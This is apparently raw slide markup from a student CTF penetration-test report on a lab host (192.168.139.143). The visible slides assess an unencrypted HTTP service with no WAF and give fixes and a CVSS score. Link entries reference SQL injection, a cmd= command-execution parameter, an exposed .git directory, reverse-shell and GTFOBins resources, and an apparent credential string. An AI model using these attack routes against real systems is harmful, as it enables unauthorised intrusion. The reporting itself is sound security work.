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4"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="257" r:id="rId2"/>
    <p:sldId id="256"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7" autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="77" d="100"/>
          <a:sy n="77" d="100"/>
        </p:scale>
        <p:origin x="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F02AC-1F3E-4BDB-B55C-A3E09FCC99D0}"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108BC-7104-40B1-A6BA-584C2733DDEF}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="402738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24108BC-7104-40B1-A6BA-584C2733DDEF}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2779033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6A26819-B112-4757-BD5E-4DEB3FC3F7EE}"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66034A3-D2B2-47A6-B89A-0E70A495C76E}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="154751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6A26819-B112-4757-BD5E-4DEB3FC3F7EE}"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034A3-D2B2-47A6-B89A-0E70A495C76E}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17200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6A26819-B112-4757-BD5E-4DEB3FC3F7EE}"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034A3-D2B2-47A6-B89A-0E70A495C76E}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="80101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6A26819-B112-4757-BD5E-4DEB3FC3F7EE}"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6034A3-D2B2-47A6-B89A-0E70A495C76E}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="89602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6A26819-B112-4757-BD5E-4DEB3FC3F7EE}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>03-08-2025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66034A3-D2B2-47A6-B89A-0E70A495C76E}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="300536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6A26819-B112-4757-BD5E-4DEB3FC3F7EE}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>03-08-2025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6034A3-D2B2-47A6-B89A-0E70A495C76E}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="327218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6A26819-B112-4757-BD5E-4DEB3FC3F7EE}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>03-08-2025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6034A3-D2B2-47A6-B89A-0E70A495C76E}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="105912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6A26819-B112-4757-BD5E-4DEB3FC3F7EE}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>03-08-2025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6034A3-D2B2-47A6-B89A-0E70A495C76E}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="329732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26819-B112-4757-BD5E-4DEB3FC3F7EE}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>03-08-2025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6034A3-D2B2-47A6-B89A-0E70A495C76E}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="234918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6A26819-B112-4757-BD5E-4DEB3FC3F7EE}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>03-08-2025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6034A3-D2B2-47A6-B89A-0E70A495C76E}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="124526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6A26819-B112-4757-BD5E-4DEB3FC3F7EE}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>03-08-2025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6034A3-D2B2-47A6-B89A-0E70A495C76E}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="110701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6A26819-B112-4757-BD5E-4DEB3FC3F7EE}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>03-08-2025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66034A3-D2B2-47A6-B89A-0E70A495C76E}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6691520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192.168.139.14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heatsheetseries.owasp.org/cheatsheets/Transport_Layer_Security_Cheat_Shee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92.168.139.143/"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hyperlink" Target="http://192.168.139.143/.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dium.com/stolabs/git-exposed-how-to-identify-and-exploit-62df3c165c3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92.168.139.143/.git/" TargetMode="Externa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hyperlink" Target="http://192.168.139.143/.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lanf@admin.com:321" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/798.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hyperlink" Target="mailto:lanf@admin.com:321"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lanf@admin.com:321" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/307.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192.168.139.143/dashboard.ph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we.mitre.org/data/definitions/89.html" TargetMode="External"/><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hyperlink" Target="http://192.168.139.143/dashboard.ph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we.mitre.org/data/definitions/89.html" TargetMode="External"/><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hyperlink" Target="http://192.168.139.143/dashboard.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irst.org/cvss/calculator/3-1" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/attacks/SQL_Injection"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hyperlink" Target="http://192.168.139.143/dashboard.php"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owasp.org/Top10/A01_2021-Broken_Access_Control/"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mailto:jehad@192.168.139.14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jehad@192.168.139.143"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afatech.sa/blog/linux/linux-security/best-practices-for-securing-command-history-files-on-linux-servers/#:~:text=By%20default%2C%20Linux%20systems%20maintain,risk%20if%20not%20managed%20properly" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-top-ten/2017/A3_2017-Sensitive_Data_Exposu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ssh.com/academy/ssh/tunneling-example" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/attacks/Command_Injection" TargetMode="Externa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127.0.0.1:9999/index.php?cmd="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ighon.coffee/blog/reverse-shell-cheat-sheet/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/attacks/Command_Injectio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gtfobins.github.io/gtfobins/python/"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owasp.org/www-project-top-ten/2017/A5_2017-Broken_Access_Control" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.redhat.com/sysadmin/linux-file-permission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www.redhat.com/en/blog/linux-file-permissions-explained" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/attacks/SQL/_Injection%5d(https:/owasp.org/www-community/attacks/SQL_Injection" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/burp%5d(https:/portswigger.net/burp" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/3-0" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.vulnhub.com](https/www.vulnhub.com" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/book/man.html%5d(https:/nmap.org/book/man.html" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kali.org/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://highon.coffee/blog/reverse-shell-cheat-sheet/%5d(https:/highon.coffee/blog/reverse-shell-cheat-sheet/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ssh.com/academy/ssh/security-best-practices%5d(https:/www.ssh.com/academy/ssh/security-best-practices" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/gtfobins/python/%5d(https:/gtfobins.github.io/gtfobins/python/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-top-ten/2017/A5/_2017-Broken/_Access/_Contro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jehad@192.168.139.14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edium.com/weeklycloud/how-ssh-really-works-4d8a6a862409"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mailto:jehad@192.168.139.143"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DFE98E-C74A-E555-790D-E812CB54FB8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" u="sng" dirty="0"/>
              <a:t>CTF Exploitation Breakdown form Recon to Root Shell.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Subtitle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D01E08F7-1145-4AE9-DAFE-38D78102A9CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1069847" y="4389119"/>
            <a:ext cx="8292813" cy="1862594"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0"/>
              <a:t>PROJECT REPORT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>This project </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>simulating a real-world attack scenario.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Created By: Shubham K</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20635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6CE98-5F09-4643-D5F8-648094F65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A7E76F-E5BF-D579-E225-43741CA5DC41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="256033"/>
            <a:ext cx="10058400" cy="549038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Open HTTP Port (80) Without HTTPS or WAF</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4466862F-9725-91E2-5E69-41C1C55311B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="805071"/>
            <a:ext cx="11628783" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Vulnerability Name: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>Unsecured HTTP Service (Port 80)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Vulnerability Description: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>The target system hosts a web application that is accessible over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>HTTP on port 80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> without encryption (HTTPS) and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>without any Web Application Firewall (WAF)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. This allows data to be transmitted in plaintext and exposes the application to attacks such as MITM (Man-in-the-Middle), data sniffing, session hijacking, and automated attack traffic like SQL Injection or XSS due to the absence of application-layer filtering.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Affected Machine, URL &amp; Parameter: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0"/>
              <a:t>Machine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>: 192.168.139.143 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0"/>
              <a:t>Port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>: 80/tcp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://192.168.139.143/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0"/>
              <a:t>Parameters: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>Login page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>(/login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" i="1" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>- Credential submission over HTTP,Dashboard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>(/dashboard.php?id=) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>- SQL injection vector &amp; Index page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>(/index.php?cmd=) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>- RCE vector </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Severity:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>Medium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>This vulnerability is significant because it creates a weak entry point, especially when combined with other web-layer vulnerabilities like SQLi and credential reuse, which were present in our test.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Risk / Impact: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sensitive data (login credentials, session tokens) can be intercepted over the network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Increases exposure to automated attacks (e.g., SQLi, XSS) due to lack of WAF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No HTTPS allows attackers to inject or modify data in transit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session Hijacking: Attackers can steal cookies via packet sniffing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Combined with other flaws, this can lead to full system compromise, as seen in our test.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="410750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69F01-303E-0327-DA70-26509C10A7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F62AD-F658-D0A0-B7C9-757F6BC2C5EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="256033"/>
            <a:ext cx="10058400" cy="549038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0" err="1"/>
              <a:t>Cont</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98D87636-A445-ACA5-42BD-D5EB9A93B0EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="805071"/>
            <a:ext cx="11628783" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Recommendation: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Enforce HTTPS using SSL/TLS (e.g., with Let's Encrypt).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Redirect all HTTP requests to HTTPS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Implement a Web Application Firewall (WAF) to filter malicious inputs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Set HTTP security headers (e.g., HSTS, CSP).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Regularly monitor and patch exposed services</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>CVSS Score: 6.1 (Medium)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>CVSS String: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" b="1" dirty="0"/>
              <a:t>CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>References: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>    OWASP Cheat Sheet-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
